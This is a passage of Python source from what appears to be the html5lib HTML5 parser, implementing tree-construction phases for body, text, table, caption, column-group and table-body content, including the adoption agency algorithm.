(headingElements, self.endTagHeading),
(("a", "b", "big", "code", "em", "font", "i", "nobr", "s", "small",
"strike", "strong", "tt", "u"), self.endTagFormatting),
(("applet", "marquee", "object"), self.endTagAppletMarqueeObject),
("br", self.endTagBr),
])
self.endTagHandler.default = self.endTagOther
def isMatchingFormattingElement(self, node1, node2):
return (node1.name == node2.name and
node1.namespace == node2.namespace and
node1.attributes == node2.attributes)
# helper
def addFormattingElement(self, token):
self.tree.insertElement(token)
element = self.tree.openElements[-1]
matchingElements = []
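            # "Noah's Ark" clause: the list of active formatting elements may
            # contain at most three entries with the same name, namespace and
            # attributes, so collect existing matches to evict the oldest.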
for node in self.tree.activeFormattingElements[::-1]:
if node is Marker:
break
elif self.isMatchingFormattingElement(node, element):
matchingElements.append(node)
assert len(matchingElements) <= 3
if len(matchingElements) == 3:
self.tree.activeFormattingElements.remove(matchingElements[-1])
self.tree.activeFormattingElements.append(element)
# the real deal
def processEOF(self):
allowed_elements = frozenset(("dd", "dt", "li", "p", "tbody", "td",
"tfoot", "th", "thead", "tr", "body",
"html"))
for node in self.tree.openElements[::-1]:
if node.name not in allowed_elements:
self.parser.parseError("expected-closing-tag-but-got-eof")
break
# Stop parsing
def processSpaceCharactersDropNewline(self, token):
# Sometimes (start of <pre>, <listing>, and <textarea> blocks) we
# want to drop leading newlines
data = token["data"]
self.processSpaceCharacters = self.processSpaceCharactersNonPre
if (data.startswith("\n") and
self.tree.openElements[-1].name in ("pre", "listing", "textarea") and
not self.tree.openElements[-1].hasContent()):
data = data[1:]
if data:
self.tree.reconstructActiveFormattingElements()
self.tree.insertText(data)
def processCharacters(self, token):
if token["data"] == "\u0000":
# The tokenizer should always emit null on its own
return
self.tree.reconstructActiveFormattingElements()
self.tree.insertText(token["data"])
# This must be bad for performance
if (self.parser.framesetOK and
any([char not in spaceCharacters
for char in token["data"]])):
self.parser.framesetOK = False
def processSpaceCharactersNonPre(self, token):
self.tree.reconstructActiveFormattingElements()
self.tree.insertText(token["data"])
def startTagProcessInHead(self, token):
return self.parser.phases["inHead"].processStartTag(token)
def startTagBody(self, token):
self.parser.parseError("unexpected-start-tag", {"name": "body"})
if (len(self.tree.openElements) == 1 or
self.tree.openElements[1].name != "body"):
assert self.parser.innerHTML
else:
self.parser.framesetOK = False
for attr, value in token["data"].items():
if attr not in self.tree.openElements[1].attributes:
self.tree.openElements[1].attributes[attr] = value
def startTagFrameset(self, token):
self.parser.parseError("unexpected-start-tag", {"name": "frameset"})
if (len(self.tree.openElements) == 1 or self.tree.openElements[1].name != "body"):
assert self.parser.innerHTML
elif not self.parser.framesetOK:
pass
else:
if self.tree.openElements[1].parent:
self.tree.openElements[1].parent.removeChild(self.tree.openElements[1])
while self.tree.openElements[-1].name != "html":
self.tree.openElements.pop()
self.tree.insertElement(token)
self.parser.phase = self.parser.phases["inFrameset"]
def startTagCloseP(self, token):
if self.tree.elementInScope("p", variant="button"):
self.endTagP(impliedTagToken("p"))
self.tree.insertElement(token)
def startTagPreListing(self, token):
if self.tree.elementInScope("p", variant="button"):
self.endTagP(impliedTagToken("p"))
self.tree.insertElement(token)
self.parser.framesetOK = False
self.processSpaceCharacters = self.processSpaceCharactersDropNewline
def startTagForm(self, token):
if self.tree.formPointer:
self.parser.parseError("unexpected-start-tag", {"name": "form"})
else:
if self.tree.elementInScope("p", variant="button"):
self.endTagP(impliedTagToken("p"))
self.tree.insertElement(token)
self.tree.formPointer = self.tree.openElements[-1]
def startTagListItem(self, token):
self.parser.framesetOK = False
stopNamesMap = {"li": ["li"],
"dt": ["dt", "dd"],
"dd": ["dt", "dd"]}
stopNames = stopNamesMap[token["name"]]
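            # Walk up the stack closing any open li/dd/dt of the same kind,
            # stopping early at special elements other than address, div or p.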
for node in reversed(self.tree.openElements):
if node.name in stopNames:
self.parser.phase.processEndTag(
impliedTagToken(node.name, "EndTag"))
break
if (node.nameTuple in specialElements and
node.name not in ("address", "div", "p")):
break
if self.tree.elementInScope("p", variant="button"):
self.parser.phase.processEndTag(
impliedTagToken("p", "EndTag"))
self.tree.insertElement(token)
def startTagPlaintext(self, token):
if self.tree.elementInScope("p", variant="button"):
self.endTagP(impliedTagToken("p"))
self.tree.insertElement(token)
self.parser.tokenizer.state = self.parser.tokenizer.plaintextState
def startTagHeading(self, token):
if self.tree.elementInScope("p", variant="button"):
self.endTagP(impliedTagToken("p"))
if self.tree.openElements[-1].name in headingElements:
self.parser.parseError("unexpected-start-tag", {"name": token["name"]})
self.tree.openElements.pop()
self.tree.insertElement(token)
def startTagA(self, token):
afeAElement = self.tree.elementInActiveFormattingElements("a")
if afeAElement:
self.parser.parseError("unexpected-start-tag-implies-end-tag",
{"startName": "a", "endName": "a"})
self.endTagFormatting(impliedTagToken("a"))
if afeAElement in self.tree.openElements:
self.tree.openElements.remove(afeAElement)
if afeAElement in self.tree.activeFormattingElements:
self.tree.activeFormattingElements.remove(afeAElement)
self.tree.reconstructActiveFormattingElements()
self.addFormattingElement(token)
def startTagFormatting(self, token):
self.tree.reconstructActiveFormattingElements()
self.addFormattingElement(token)
def startTagNobr(self, token):
self.tree.reconstructActiveFormattingElements()
if self.tree.elementInScope("nobr"):
self.parser.parseError("unexpected-start-tag-implies-end-tag",
{"startName": "nobr", "endName": "nobr"})
self.processEndTag(impliedTagToken("nobr"))
# XXX Need tests that trigger the following
self.tree.reconstructActiveFormattingElements()
self.addFormattingElement(token)
def startTagButton(self, token):
if self.tree.elementInScope("button"):
self.parser.parseError("unexpected-start-tag-implies-end-tag",
{"startName": "button", "endName": "button"})
self.processEndTag(impliedTagToken("button"))
return token
else:
self.tree.reconstructActiveFormattingElements()
self.tree.insertElement(token)
self.parser.framesetOK = False
def startTagAppletMarqueeObject(self, token):
self.tree.reconstructActiveFormattingElements()
self.tree.insertElement(token)
self.tree.activeFormattingElements.append(Marker)
self.parser.framesetOK = False
def startTagXmp(self, token):
if self.tree.elementInScope("p", variant="button"):
self.endTagP(impliedTagToken("p"))
self.tree.reconstructActiveFormattingElements()
self.parser.framesetOK = False
self.parser.parseRCDataRawtext(token, "RAWTEXT")
def startTagTable(self, token):
if self.parser.compatMode != "quirks":
if self.tree.elementInScope("p", variant="button"):
self.processEndTag(impliedTagToken("p"))
self.tree.insertElement(token)
self.parser.framesetOK = False
self.parser.phase = self.parser.phases["inTable"]
def startTagVoidFormatting(self, token):
self.tree.reconstructActiveFormattingElements()
self.tree.insertElement(token)
self.tree.openElements.pop()
token["selfClosingAcknowledged"] = True
self.parser.framesetOK = False
def startTagInput(self, token):
framesetOK = self.parser.framesetOK
self.startTagVoidFormatting(token)
if ("type" in token["data"] and
token["data"]["type"].translate(asciiUpper2Lower) == "hidden"):
# input type=hidden doesn't change framesetOK
self.parser.framesetOK = framesetOK
def startTagParamSource(self, token):
self.tree.insertElement(token)
self.tree.openElements.pop()
token["selfClosingAcknowledged"] = True
def startTagHr(self, token):
if self.tree.elementInScope("p", variant="button"):
self.endTagP(impliedTagToken("p"))
self.tree.insertElement(token)
self.tree.openElements.pop()
token["selfClosingAcknowledged"] = True
self.parser.framesetOK = False
def startTagImage(self, token):
# No really...
self.parser.parseError("unexpected-start-tag-treated-as",
{"originalName": "image", "newName": "img"})
self.processStartTag(impliedTagToken("img", "StartTag",
attributes=token["data"],
selfClosing=token["selfClosing"]))
def startTagIsIndex(self, token):
self.parser.parseError("deprecated-tag", {"name": "isindex"})
if self.tree.formPointer:
return
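            # Rewrite <isindex> into the equivalent explicit markup:
            # <form><hr><label>prompt<input name=isindex></label><hr></form>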
form_attrs = {}
if "action" in token["data"]:
form_attrs["action"] = token["data"]["action"]
self.processStartTag(impliedTagToken("form", "StartTag",
attributes=form_attrs))
self.processStartTag(impliedTagToken("hr", "StartTag"))
self.processStartTag(impliedTagToken("label", "StartTag"))
# XXX Localization ...
if "prompt" in token["data"]:
prompt = token["data"]["prompt"]
else:
prompt = "This is a searchable index. Enter search keywords: "
self.processCharacters(
{"type": tokenTypes["Characters"], "data": prompt})
attributes = token["data"].copy()
if "action" in attributes:
del attributes["action"]
if "prompt" in attributes:
del attributes["prompt"]
attributes["name"] = "isindex"
self.processStartTag(impliedTagToken("input", "StartTag",
attributes=attributes,
selfClosing=token["selfClosing"]))
self.processEndTag(impliedTagToken("label"))
self.processStartTag(impliedTagToken("hr", "StartTag"))
self.processEndTag(impliedTagToken("form"))
def startTagTextarea(self, token):
self.tree.insertElement(token)
self.parser.tokenizer.state = self.parser.tokenizer.rcdataState
self.processSpaceCharacters = self.processSpaceCharactersDropNewline
self.parser.framesetOK = False
def startTagIFrame(self, token):
self.parser.framesetOK = False
self.startTagRawtext(token)
def startTagNoscript(self, token):
if self.parser.scripting:
self.startTagRawtext(token)
else:
self.startTagOther(token)
def startTagRawtext(self, token):
"""iframe, noembed noframes, noscript(if scripting enabled)"""
self.parser.parseRCDataRawtext(token, "RAWTEXT")
def startTagOpt(self, token):
if self.tree.openElements[-1].name == "option":
self.parser.phase.processEndTag(impliedTagToken("option"))
self.tree.reconstructActiveFormattingElements()
self.parser.tree.insertElement(token)
def startTagSelect(self, token):
self.tree.reconstructActiveFormattingElements()
self.tree.insertElement(token)
self.parser.framesetOK = False
if self.parser.phase in (self.parser.phases["inTable"],
self.parser.phases["inCaption"],
self.parser.phases["inColumnGroup"],
self.parser.phases["inTableBody"],
self.parser.phases["inRow"],
self.parser.phases["inCell"]):
self.parser.phase = self.parser.phases["inSelectInTable"]
else:
self.parser.phase = self.parser.phases["inSelect"]
def startTagRpRt(self, token):
if self.tree.elementInScope("ruby"):
self.tree.generateImpliedEndTags()
if self.tree.openElements[-1].name != "ruby":
self.parser.parseError()
self.tree.insertElement(token)
def startTagMath(self, token):
self.tree.reconstructActiveFormattingElements()
self.parser.adjustMathMLAttributes(token)
self.parser.adjustForeignAttributes(token)
token["namespace"] = namespaces["mathml"]
self.tree.insertElement(token)
# Need to get the parse error right for the case where the token
# has a namespace not equal to the xmlns attribute
if token["selfClosing"]:
self.tree.openElements.pop()
token["selfClosingAcknowledged"] = True
def startTagSvg(self, token):
self.tree.reconstructActiveFormattingElements()
self.parser.adjustSVGAttributes(token)
self.parser.adjustForeignAttributes(token)
token["namespace"] = namespaces["svg"]
self.tree.insertElement(token)
# Need to get the parse error right for the case where the token
# has a namespace not equal to the xmlns attribute
if token["selfClosing"]:
self.tree.openElements.pop()
token["selfClosingAcknowledged"] = True
def startTagMisplaced(self, token):
""" Elements that should be children of other elements that have a
different insertion mode; here they are ignored
"caption", "col", "colgroup", "frame", "frameset", "head",
"option", "optgroup", "tbody", "td", "tfoot", "th", "thead",
"tr", "noscript"
"""
self.parser.parseError("unexpected-start-tag-ignored", {"name": token["name"]})
def startTagOther(self, token):
self.tree.reconstructActiveFormattingElements()
self.tree.insertElement(token)
def endTagP(self, token):
if not self.tree.elementInScope("p", variant="button"):
self.startTagCloseP(impliedTagToken("p", "StartTag"))
self.parser.parseError("unexpected-end-tag", {"name": "p"})
self.endTagP(impliedTagToken("p", "EndTag"))
else:
self.tree.generateImpliedEndTags("p")
if self.tree.openElements[-1].name != "p":
self.parser.parseError("unexpected-end-tag", {"name": "p"})
node = self.tree.openElements.pop()
while node.name != "p":
node = self.tree.openElements.pop()
def endTagBody(self, token):
if not self.tree.elementInScope("body"):
self.parser.parseError()
return
elif self.tree.openElements[-1].name != "body":
for node in self.tree.openElements[2:]:
if node.name not in frozenset(("dd", "dt", "li", "optgroup",
"option", "p", "rp", "rt",
"tbody", "td", "tfoot",
"th", "thead", "tr", "body",
"html")):
# Not sure this is the correct name for the parse error
self.parser.parseError(
"expected-one-end-tag-but-got-another",
{"gotName": "body", "expectedName": node.name})
break
self.parser.phase = self.parser.phases["afterBody"]
def endTagHtml(self, token):
# We repeat the test for the body end tag token being ignored here
if self.tree.elementInScope("body"):
self.endTagBody(impliedTagToken("body"))
return token
def endTagBlock(self, token):
# Put us back in the right whitespace handling mode
if token["name"] == "pre":
self.processSpaceCharacters = self.processSpaceCharactersNonPre
inScope = self.tree.elementInScope(token["name"])
if inScope:
self.tree.generateImpliedEndTags()
if self.tree.openElements[-1].name != token["name"]:
self.parser.parseError("end-tag-too-early", {"name": token["name"]})
if inScope:
node = self.tree.openElements.pop()
while node.name != token["name"]:
node = self.tree.openElements.pop()
def endTagForm(self, token):
node = self.tree.formPointer
self.tree.formPointer = None
if node is None or not self.tree.elementInScope(node):
self.parser.parseError("unexpected-end-tag",
{"name": "form"})
else:
self.tree.generateImpliedEndTags()
if self.tree.openElements[-1] != node:
self.parser.parseError("end-tag-too-early-ignored",
{"name": "form"})
self.tree.openElements.remove(node)
def endTagListItem(self, token):
if token["name"] == "li":
variant = "list"
else:
variant = None
if not self.tree.elementInScope(token["name"], variant=variant):
self.parser.parseError("unexpected-end-tag", {"name": token["name"]})
else:
self.tree.generateImpliedEndTags(exclude=token["name"])
if self.tree.openElements[-1].name != token["name"]:
self.parser.parseError(
"end-tag-too-early",
{"name": token["name"]})
node = self.tree.openElements.pop()
while node.name != token["name"]:
node = self.tree.openElements.pop()
def endTagHeading(self, token):
for item in headingElements:
if self.tree.elementInScope(item):
self.tree.generateImpliedEndTags()
break
if self.tree.openElements[-1].name != token["name"]:
self.parser.parseError("end-tag-too-early", {"name": token["name"]})
for item in headingElements:
if self.tree.elementInScope(item):
item = self.tree.openElements.pop()
while item.name not in headingElements:
item = self.tree.openElements.pop()
break
def endTagFormatting(self, token):
"""The much-feared adoption agency algorithm"""
# http://svn.whatwg.org/webapps/complete.html#adoptionAgency revision 7867
# XXX Better parseError messages appreciated.
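            # Example of the misnesting this repairs: "<b>1<p>2</b>3</p>"
            # becomes <b>1</b><p><b>2</b>3</p>, cloning the formatting
            # element into the furthest block.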
# Step 1
outerLoopCounter = 0
# Step 2
while outerLoopCounter < 8:
# Step 3
outerLoopCounter += 1
# Step 4:
# Let the formatting element be the last element in
# the list of active formatting elements that:
# - is between the end of the list and the last scope
# marker in the list, if any, or the start of the list
# otherwise, and
# - has the same tag name as the token.
formattingElement = self.tree.elementInActiveFormattingElements(
token["name"])
if (not formattingElement or
(formattingElement in self.tree.openElements and
not self.tree.elementInScope(formattingElement.name))):
# If there is no such node, then abort these steps
# and instead act as described in the "any other
# end tag" entry below.
self.endTagOther(token)
return
# Otherwise, if there is such a node, but that node is
# not in the stack of open elements, then this is a
# parse error; remove the element from the list, and
# abort these steps.
elif formattingElement not in self.tree.openElements:
self.parser.parseError("adoption-agency-1.2", {"name": token["name"]})
self.tree.activeFormattingElements.remove(formattingElement)
return
# Otherwise, if there is such a node, and that node is
# also in the stack of open elements, but the element
# is not in scope, then this is a parse error; ignore
# the token, and abort these steps.
elif not self.tree.elementInScope(formattingElement.name):
self.parser.parseError("adoption-agency-4.4", {"name": token["name"]})
return
# Otherwise, there is a formatting element and that
# element is in the stack and is in scope. If the
# element is not the current node, this is a parse
# error. In any case, proceed with the algorithm as
# written in the following steps.
else:
if formattingElement != self.tree.openElements[-1]:
self.parser.parseError("adoption-agency-1.3", {"name": token["name"]})
# Step 5:
# Let the furthest block be the topmost node in the
# stack of open elements that is lower in the stack
# than the formatting element, and is an element in
# the special category. There might not be one.
afeIndex = self.tree.openElements.index(formattingElement)
furthestBlock = None
for element in self.tree.openElements[afeIndex:]:
if element.nameTuple in specialElements:
furthestBlock = element
break
# Step 6:
# If there is no furthest block, then the UA must
# first pop all the nodes from the bottom of the stack
# of open elements, from the current node up to and
# including the formatting element, then remove the
# formatting element from the list of active
# formatting elements, and finally abort these steps.
if furthestBlock is None:
element = self.tree.openElements.pop()
while element != formattingElement:
element = self.tree.openElements.pop()
self.tree.activeFormattingElements.remove(element)
return
# Step 7
commonAncestor = self.tree.openElements[afeIndex - 1]
# Step 8:
# The bookmark is supposed to help us identify where to reinsert
# nodes in step 15. We have to ensure that we reinsert nodes after
# the node before the active formatting element. Note the bookmark
# can move in step 9.7
bookmark = self.tree.activeFormattingElements.index(formattingElement)
# Step 9
lastNode = node = furthestBlock
innerLoopCounter = 0
index = self.tree.openElements.index(node)
while innerLoopCounter < 3:
innerLoopCounter += 1
# Node is element before node in open elements
index -= 1
node = self.tree.openElements[index]
if node not in self.tree.activeFormattingElements:
self.tree.openElements.remove(node)
continue
# Step 9.6
if node == formattingElement:
break
# Step 9.7
if lastNode == furthestBlock:
bookmark = self.tree.activeFormattingElements.index(node) + 1
# Step 9.8
clone = node.cloneNode()
# Replace node with clone
self.tree.activeFormattingElements[
self.tree.activeFormattingElements.index(node)] = clone
self.tree.openElements[
self.tree.openElements.index(node)] = clone
node = clone
# Step 9.9
# Remove lastNode from its parents, if any
if lastNode.parent:
lastNode.parent.removeChild(lastNode)
node.appendChild(lastNode)
# Step 9.10
lastNode = node
# Step 10
# Foster parent lastNode if commonAncestor is a
# table, tbody, tfoot, thead, or tr we need to foster
# parent the lastNode
if lastNode.parent:
lastNode.parent.removeChild(lastNode)
if commonAncestor.name in frozenset(("table", "tbody", "tfoot", "thead", "tr")):
parent, insertBefore = self.tree.getTableMisnestedNodePosition()
parent.insertBefore(lastNode, insertBefore)
else:
commonAncestor.appendChild(lastNode)
# Step 11
clone = formattingElement.cloneNode()
# Step 12
furthestBlock.reparentChildren(clone)
# Step 13
furthestBlock.appendChild(clone)
# Step 14
self.tree.activeFormattingElements.remove(formattingElement)
self.tree.activeFormattingElements.insert(bookmark, clone)
# Step 15
self.tree.openElements.remove(formattingElement)
self.tree.openElements.insert(
self.tree.openElements.index(furthestBlock) + 1, clone)
def endTagAppletMarqueeObject(self, token):
if self.tree.elementInScope(token["name"]):
self.tree.generateImpliedEndTags()
if self.tree.openElements[-1].name != token["name"]:
self.parser.parseError("end-tag-too-early", {"name": token["name"]})
if self.tree.elementInScope(token["name"]):
element = self.tree.openElements.pop()
while element.name != token["name"]:
element = self.tree.openElements.pop()
self.tree.clearActiveFormattingElements()
def endTagBr(self, token):
self.parser.parseError("unexpected-end-tag-treated-as",
{"originalName": "br", "newName": "br element"})
self.tree.reconstructActiveFormattingElements()
self.tree.insertElement(impliedTagToken("br", "StartTag"))
self.tree.openElements.pop()
def endTagOther(self, token):
for node in self.tree.openElements[::-1]:
if node.name == token["name"]:
self.tree.generateImpliedEndTags(exclude=token["name"])
if self.tree.openElements[-1].name != token["name"]:
self.parser.parseError("unexpected-end-tag", {"name": token["name"]})
while self.tree.openElements.pop() != node:
pass
break
else:
if node.nameTuple in specialElements:
self.parser.parseError("unexpected-end-tag", {"name": token["name"]})
break
class TextPhase(Phase):
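        # Handles RCDATA and RAWTEXT content (title, textarea, style, script,
        # ...): character tokens are inserted verbatim until the matching end
        # tag, after which the parser returns to the original phase.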
def __init__(self, parser, tree):
Phase.__init__(self, parser, tree)
self.startTagHandler = _utils.MethodDispatcher([])
self.startTagHandler.default = self.startTagOther
self.endTagHandler = _utils.MethodDispatcher([
("script", self.endTagScript)])
self.endTagHandler.default = self.endTagOther
def processCharacters(self, token):
self.tree.insertText(token["data"])
def processEOF(self):
self.parser.parseError("expected-named-closing-tag-but-got-eof",
{"name": self.tree.openElements[-1].name})
self.tree.openElements.pop()
self.parser.phase = self.parser.originalPhase
return True
def startTagOther(self, token):
assert False, "Tried to process start tag %s in RCDATA/RAWTEXT mode" % token['name']
def endTagScript(self, token):
node = self.tree.openElements.pop()
assert node.name == "script"
self.parser.phase = self.parser.originalPhase
# The rest of this method is all stuff that only happens if
# document.write works
def endTagOther(self, token):
self.tree.openElements.pop()
self.parser.phase = self.parser.originalPhase
class InTablePhase(Phase):
# http://www.whatwg.org/specs/web-apps/current-work/#in-table
def __init__(self, parser, tree):
Phase.__init__(self, parser, tree)
self.startTagHandler = _utils.MethodDispatcher([
("html", self.startTagHtml),
("caption", self.startTagCaption),
("colgroup", self.startTagColgroup),
("col", self.startTagCol),
(("tbody", "tfoot", "thead"), self.startTagRowGroup),
(("td", "th", "tr"), self.startTagImplyTbody),
("table", self.startTagTable),
(("style", "script"), self.startTagStyleScript),
("input", self.startTagInput),
("form", self.startTagForm)
])
self.startTagHandler.default = self.startTagOther
self.endTagHandler = _utils.MethodDispatcher([
("table", self.endTagTable),
(("body", "caption", "col", "colgroup", "html", "tbody", "td",
"tfoot", "th", "thead", "tr"), self.endTagIgnore)
])
self.endTagHandler.default = self.endTagOther
# helper methods
def clearStackToTableContext(self):
# "clear the stack back to a table context"
while self.tree.openElements[-1].name not in ("table", "html"):
# self.parser.parseError("unexpected-implied-end-tag-in-table",
# {"name": self.tree.openElements[-1].name})
self.tree.openElements.pop()
# When the current node is <html> it's an innerHTML case
# processing methods
def processEOF(self):
if self.tree.openElements[-1].name != "html":
self.parser.parseError("eof-in-table")
else:
assert self.parser.innerHTML
# Stop parsing
def processSpaceCharacters(self, token):
originalPhase = self.parser.phase
self.parser.phase = self.parser.phases["inTableText"]
self.parser.phase.originalPhase = originalPhase
self.parser.phase.processSpaceCharacters(token)
def processCharacters(self, token):
originalPhase = self.parser.phase
self.parser.phase = self.parser.phases["inTableText"]
self.parser.phase.originalPhase = originalPhase
self.parser.phase.processCharacters(token)
def insertText(self, token):
# If we get here there must be at least one non-whitespace character
# Do the table magic!
self.tree.insertFromTable = True
self.parser.phases["inBody"].processCharacters(token)
self.tree.insertFromTable = False
def startTagCaption(self, token):
self.clearStackToTableContext()
self.tree.activeFormattingElements.append(Marker)
self.tree.insertElement(token)
self.parser.phase = self.parser.phases["inCaption"]
def startTagColgroup(self, token):
self.clearStackToTableContext()
self.tree.insertElement(token)
self.parser.phase = self.parser.phases["inColumnGroup"]
def startTagCol(self, token):
self.startTagColgroup(impliedTagToken("colgroup", "StartTag"))
return token
def startTagRowGroup(self, token):
self.clearStackToTableContext()
self.tree.insertElement(token)
self.parser.phase = self.parser.phases["inTableBody"]
def startTagImplyTbody(self, token):
self.startTagRowGroup(impliedTagToken("tbody", "StartTag"))
return token
def startTagTable(self, token):
self.parser.parseError("unexpected-start-tag-implies-end-tag",
{"startName": "table", "endName": "table"})
self.parser.phase.processEndTag(impliedTagToken("table"))
if not self.parser.innerHTML:
return token
def startTagStyleScript(self, token):
return self.parser.phases["inHead"].processStartTag(token)
def startTagInput(self, token):
if ("type" in token["data"] and
token["data"]["type"].translate(asciiUpper2Lower) == "hidden"):
self.parser.parseError("unexpected-hidden-input-in-table")
self.tree.insertElement(token)
# XXX associate with form
self.tree.openElements.pop()
else:
self.startTagOther(token)
def startTagForm(self, token):
self.parser.parseError("unexpected-form-in-table")
if self.tree.formPointer is None:
self.tree.insertElement(token)
self.tree.formPointer = self.tree.openElements[-1]
self.tree.openElements.pop()
def startTagOther(self, token):
self.parser.parseError("unexpected-start-tag-implies-table-voodoo", {"name": token["name"]})
# Do the table magic!
self.tree.insertFromTable = True
self.parser.phases["inBody"].processStartTag(token)
self.tree.insertFromTable = False
def endTagTable(self, token):
if self.tree.elementInScope("table", variant="table"):
self.tree.generateImpliedEndTags()
if self.tree.openElements[-1].name != "table":
self.parser.parseError("end-tag-too-early-named",
{"gotName": "table",
"expectedName": self.tree.openElements[-1].name})
while self.tree.openElements[-1].name != "table":
self.tree.openElements.pop()
self.tree.openElements.pop()
self.parser.resetInsertionMode()
else:
# innerHTML case
assert self.parser.innerHTML
self.parser.parseError()
def endTagIgnore(self, token):
self.parser.parseError("unexpected-end-tag", {"name": token["name"]})
def endTagOther(self, token):
self.parser.parseError("unexpected-end-tag-implies-table-voodoo", {"name": token["name"]})
# Do the table magic!
self.tree.insertFromTable = True
self.parser.phases["inBody"].processEndTag(token)
self.tree.insertFromTable = False
class InTableTextPhase(Phase):
def __init__(self, parser, tree):
Phase.__init__(self, parser, tree)
self.originalPhase = None
self.characterTokens = []
def flushCharacters(self):
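            # Whitespace-only runs may be inserted into the table directly;
            # a run containing any other character is re-routed through the
            # "in body" phase with insertFromTable set, which foster-parents
            # the text before the table.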
data = "".join([item["data"] for item in self.characterTokens])
if any([item not in spaceCharacters for item in data]):
token = {"type": tokenTypes["Characters"], "data": data}
self.parser.phases["inTable"].insertText(token)
elif data:
self.tree.insertText(data)
self.characterTokens = []
def processComment(self, token):
self.flushCharacters()
self.parser.phase = self.originalPhase
return token
def processEOF(self):
self.flushCharacters()
self.parser.phase = self.originalPhase
return True
def processCharacters(self, token):
if token["data"] == "\u0000":
return
self.characterTokens.append(token)
def processSpaceCharacters(self, token):
            # Whitespace tokens are not expected to reach this phase
            # separately, but buffer them defensively all the same.
            self.characterTokens.append(token)
def processStartTag(self, token):
self.flushCharacters()
self.parser.phase = self.originalPhase
return token
def processEndTag(self, token):
self.flushCharacters()
self.parser.phase = self.originalPhase
return token
class InCaptionPhase(Phase):
# http://www.whatwg.org/specs/web-apps/current-work/#in-caption
def __init__(self, parser, tree):
Phase.__init__(self, parser, tree)
self.startTagHandler = _utils.MethodDispatcher([
("html", self.startTagHtml),
(("caption", "col", "colgroup", "tbody", "td", "tfoot", "th",
"thead", "tr"), self.startTagTableElement)
])
self.startTagHandler.default = self.startTagOther
self.endTagHandler = _utils.MethodDispatcher([
("caption", self.endTagCaption),
("table", self.endTagTable),
(("body", "col", "colgroup", "html", "tbody", "td", "tfoot", "th",
"thead", "tr"), self.endTagIgnore)
])
self.endTagHandler.default = self.endTagOther
def ignoreEndTagCaption(self):
return not self.tree.elementInScope("caption", variant="table")
def processEOF(self):
self.parser.phases["inBody"].processEOF()
def processCharacters(self, token):
return self.parser.phases["inBody"].processCharacters(token)
def startTagTableElement(self, token):
self.parser.parseError()
# XXX Have to duplicate logic here to find out if the tag is ignored
ignoreEndTag = self.ignoreEndTagCaption()
self.parser.phase.processEndTag(impliedTagToken("caption"))
if not ignoreEndTag:
return token
def startTagOther(self, token):
return self.parser.phases["inBody"].processStartTag(token)
def endTagCaption(self, token):
if not self.ignoreEndTagCaption():
# AT this code is quite similar to endTagTable in "InTable"
self.tree.generateImpliedEndTags()
if self.tree.openElements[-1].name != "caption":
self.parser.parseError("expected-one-end-tag-but-got-another",
{"gotName": "caption",
"expectedName": self.tree.openElements[-1].name})
while self.tree.openElements[-1].name != "caption":
self.tree.openElements.pop()
self.tree.openElements.pop()
self.tree.clearActiveFormattingElements()
self.parser.phase = self.parser.phases["inTable"]
else:
# innerHTML case
assert self.parser.innerHTML
self.parser.parseError()
def endTagTable(self, token):
self.parser.parseError()
ignoreEndTag = self.ignoreEndTagCaption()
self.parser.phase.processEndTag(impliedTagToken("caption"))
if not ignoreEndTag:
return token
def endTagIgnore(self, token):
self.parser.parseError("unexpected-end-tag", {"name": token["name"]})
def endTagOther(self, token):
return self.parser.phases["inBody"].processEndTag(token)
class InColumnGroupPhase(Phase):
# http://www.whatwg.org/specs/web-apps/current-work/#in-column
def __init__(self, parser, tree):
Phase.__init__(self, parser, tree)
self.startTagHandler = _utils.MethodDispatcher([
("html", self.startTagHtml),
("col", self.startTagCol)
])
self.startTagHandler.default = self.startTagOther
self.endTagHandler = _utils.MethodDispatcher([
("colgroup", self.endTagColgroup),
("col", self.endTagCol)
])
self.endTagHandler.default = self.endTagOther
def ignoreEndTagColgroup(self):
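            # <html> as the current node means the fragment (innerHTML) case,
            # where the implied </colgroup> must be ignored.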
return self.tree.openElements[-1].name == "html"
def processEOF(self):
if self.tree.openElements[-1].name == "html":
assert self.parser.innerHTML
return
else:
ignoreEndTag = self.ignoreEndTagColgroup()
self.endTagColgroup(impliedTagToken("colgroup"))
if not ignoreEndTag:
return True
def processCharacters(self, token):
ignoreEndTag = self.ignoreEndTagColgroup()
self.endTagColgroup(impliedTagToken("colgroup"))
if not ignoreEndTag:
return token
def startTagCol(self, token):
self.tree.insertElement(token)
self.tree.openElements.pop()
token["selfClosingAcknowledged"] = True
def startTagOther(self, token):
ignoreEndTag = self.ignoreEndTagColgroup()
self.endTagColgroup(impliedTagToken("colgroup"))
if not ignoreEndTag:
return token
def endTagColgroup(self, token):
if self.ignoreEndTagColgroup():
# innerHTML case
assert self.parser.innerHTML
self.parser.parseError()
else:
self.tree.openElements.pop()
self.parser.phase = self.parser.phases["inTable"]
def endTagCol(self, token):
self.parser.parseError("no-end-tag", {"name": "col"})
def endTagOther(self, token):
ignoreEndTag = self.ignoreEndTagColgroup()
self.endTagColgroup(impliedTagToken("colgroup"))
if not ignoreEndTag:
return token
class InTableBodyPhase(Phase):
# http://www.whatwg.org/specs/web-apps/current-work/#in-table0
def __init__(self, parser, tree):
Phase.__init__(self, parser, tree)
self.startTagHandler = _utils.MethodDispatcher([
("html", self.startTagHtml),
("tr", self.startTagTr),
(("td", "th"), self.startTagTableCell),
(("caption", "col", "colgroup", "tbody", "tfoot", "thead"),
self.startTagTableOther)
])
self.startTagHandler.default = self.startTagOther
self.endTagHandler = _utils.MethodDispatcher([
(("tbody", "tfoot", "thead"), self.endTagTableRowGroup),
("table", self.endTagTable),
(("body", "caption", "col", "colgroup", "html", "td", "th",
"tr"), self.endTagIgnore)
])
self.endTagHandler.default = self.endTagOther
# helper methods
def clearStackToTableBodyContext(self):
while self.tree.openElements[-1].name not in ("tbody", "tfoot",
"thead", "html"):
# self.parser.parseError("unexpected-implied-end-tag-in-table",
# {"name": self.tree.openElements[-1].name})
self.tree.openElements.pop()
if self.tree.openElements[-1].name == "html":
assert self.parser.innerHTML
# the rest
def processEOF(self):
self.parser.phases["inTable"].processEOF()
def processSpaceCharacters(self, token):
return self.parser.phases["inTable"].processSpaceCharacters(token)
def processCharacters(self, token):
return self.parser.phases["inTable"].processCharacters(token)
def startTagTr(self, token):
self.clearStackToTableBodyContext()
self.tree.insertElement(token)
self.parser.phase = self.parser.phases["inRow"]
def startTagTableCell(self, token):
self.parser.parseError("unexpected-cell-in-table-body",
{"name": token["name"]})
self.startTagTr(impliedTagToken("tr", "StartTag"))
return token
def startTagTableOther(self, token):
# XXX AT Any ideas on how to share this with endTagTable?
